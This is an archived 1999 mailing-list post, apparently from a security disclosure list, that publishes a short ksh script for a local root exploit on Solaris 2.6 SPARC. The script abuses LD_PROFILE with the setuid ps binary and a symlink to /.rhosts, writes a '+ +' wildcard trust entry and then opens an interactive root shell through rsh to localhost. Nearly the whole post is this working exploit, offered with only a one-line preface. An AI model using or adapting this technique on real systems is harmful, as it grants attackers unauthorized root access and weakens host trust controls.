LD_PROFILE local root exploit for solaris 2.6

From: Steve Mynott (steveat_private)
Date: Wed Sep 22 1999 - 14:14:40 PDT

  • Next message: rfpat_private: "Re: Update to ODBC/RDS vulnerabilities"

    works on solaris 2.6 sparc anyway...
    
    #! /bin/ksh
    #  LD_PROFILE local root exploit for solaris
    #  steveat_private 19990922
    umask 000
    ln -s /.rhosts /var/tmp/ps.profile
    export LD_PROFILE=/usr/bin/ps
    /usr/bin/ps
    echo + + >  /.rhosts
    rsh -l root localhost csh -i
    
    --
    1024/D9C69DF9 steve mynott steveat_private http://www.pineal.com/
    
        those who do not understand unix are condemned to reinvent it, poorly.
            -- henry spencer
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:04:57 PDT